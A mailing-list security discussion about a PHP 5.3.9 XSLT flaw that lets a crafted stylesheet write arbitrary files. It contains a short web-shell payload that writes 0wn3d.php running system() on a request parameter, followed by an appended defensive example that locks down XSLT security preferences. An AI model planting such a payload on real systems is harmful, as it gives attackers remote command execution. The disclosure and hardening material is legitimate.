oss-sec mailing list archives

Re: CVE affected for PHP 5.3.9 ?


From: Ignacio Espinosa <osu () quodvis net>
Date: Sat, 14 Jan 2012 16:03:25 -0300

On Fri, 13 Jan 2012 13:50:59 -0700
Kurt Seifried <kseifried () redhat com> wrote:
[...]
Ok I'm still not clear on what the security claim is. Are you saying you
can cause arbitrary text output via XSL/XML mangling tricks? And
combined with having a script that uses something like "<sax:output
href="0wn3d.php" method="text">" you can put arbitrary text content into
this file which could then result in the file being parsed? The problem
is you'd have to write a script that does this, writes to a local file
with a file ending in .php or .shtml or whatever, in which case it's
pretty clear the script writer MEANT to do that. Again I'm still not
clear on what/how a security boundary is being crossed. How does this
elevate privileges or give you remote access that you wouldn't already
if you can upload arbitrary PHP scripts?



You don't need to upload arbitrary PHP scripts to make this work. Just uploading a crafted XSLT file will create
(before the patch) a file with arbitrary content, PHP code for example, as write access is enabled by default.

-- snip --
        <sax:output href="0wn3d.php" method="text">
        <xsl:value-of select="'&lt;?php system(\$_GET[&quot;cmd&quot;]);?&gt;'"/>
-- snip --


-- 
Ignacio Espinosa <osu () quodvis net>
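The defensive counterpart to the snippet above, as an added example that is not part of the thread: PHP code that applies an untrusted stylesheet while denying libxslt every file and network capability via XsltProcessor::setSecurityPrefs (available from PHP 5.4; the constructed stylesheet below carries a harmless sax:output element shaped like the one in the post, and the function name transformUntrusted is my own).

```php
<?php
// Added example (not from the thread): transform with an UNTRUSTED stylesheet
// while refusing libxslt any filesystem or network side effects.
declare(strict_types=1);

function transformUntrusted(string $xmlSource, string $xsltSource): string
{
    $xml = new DOMDocument();
    $xsl = new DOMDocument();
    // LIBXML_NONET: the parser itself must not fetch remote DTDs or entities.
    if (!$xml->loadXML($xmlSource, LIBXML_NONET) || !$xsl->loadXML($xsltSource, LIBXML_NONET)) {
        throw new InvalidArgumentException('malformed XML or XSLT input');
    }

    $proc = new XSLTProcessor();
    // Deny every capability that lets a stylesheet touch the filesystem or network
    // (sax:output / exsl:document writes, document(), remote include/import, mkdir).
    $deny = XSL_SECPREF_READ_FILE | XSL_SECPREF_WRITE_FILE | XSL_SECPREF_CREATE_DIRECTORY
          | XSL_SECPREF_READ_NETWORK | XSL_SECPREF_WRITE_NETWORK;
    $proc->setSecurityPrefs($deny);
    if (($proc->getSecurityPrefs() & $deny) !== $deny) {
        throw new RuntimeException('could not lock down XSLT security preferences');
    }
    // Never call registerPHPFunctions() on this processor: it would expose php:function().

    if (!$proc->importStylesheet($xsl)) {
        throw new InvalidArgumentException('stylesheet rejected');
    }
    $out = $proc->transformToXml($xml);
    if ($out === false) {
        throw new RuntimeException('transformation failed');
    }
    return $out;
}

// Constructed inputs: a harmless document and a stylesheet that asks libxslt to write
// a second output file. With the preferences above the write is refused (libxslt
// reports "write rights ... denied") and only the main result comes back.
$xml  = '<root><item>hello</item></root>';
$xslt = <<<'XSL'
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:sax="http://icl.com/saxon" extension-element-prefixes="sax">
  <xsl:template match="/">
    <sax:output href="should_not_exist.php" method="text"><xsl:text>x</xsl:text></sax:output>
    <result><xsl:value-of select="//item"/></result>
  </xsl:template>
</xsl:stylesheet>
XSL;

echo transformUntrusted($xml, $xslt), PHP_EOL;
var_dump(file_exists('should_not_exist.php'));
```

Run with the default preferences (remove the setSecurityPrefs call) to see the file appear, which is exactly the behaviour the post describes for unpatched builds.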

